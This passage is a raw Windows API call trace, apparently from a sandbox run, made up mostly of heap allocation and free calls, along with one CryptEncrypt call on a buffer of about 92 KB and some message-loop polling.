hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0136.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0136.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0136.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0136.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50aa0 [0136.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0136.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.183] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0136.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0136.184] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x166f2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x166f8) returned 1 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0136.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0136.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0136.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0136.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0136.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.413] CharLowerBuffW (in: lpsz="byte[91896]", cchLength=0xb | out: lpsz="byte[91896]") returned 0xb [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0136.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0136.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed9f30 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef0630 | out: hHeap=0x970000) returned 1 [0136.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 